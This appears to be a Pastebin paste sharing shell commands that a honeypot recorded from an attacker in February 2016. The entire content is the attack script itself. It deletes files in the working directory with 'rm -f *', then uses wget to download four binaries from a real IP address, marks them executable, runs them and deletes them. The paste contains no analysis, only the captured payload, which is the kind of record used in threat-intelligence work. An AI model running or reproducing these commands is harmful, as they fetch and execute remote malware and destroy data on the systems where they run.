recon-scout

Honeypot Payload! Seen on: 2016-02-15 18:44

Feb 18th, 2016
60
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.30 KB | None | 0 0
  1. rm -f *
  2. wget -q http://89.248.162.146/100; chmod +x 100; ./100; rm -f 100*
  3. rm -f *
  4. wget -q http://89.248.162.146/200; chmod +x 200; ./200; rm -f 200*
  5. rm -f *
  6. wget -q http://89.248.162.146/300; chmod +x 300; ./300; rm -f 300*
  7. rm -f *
  8. wget -q http://89.248.162.146/400; chmod +x 400; ./400; rm -f 400*
  9. rm -f *
  10. exit
Add Comment
Please, Sign In to add comment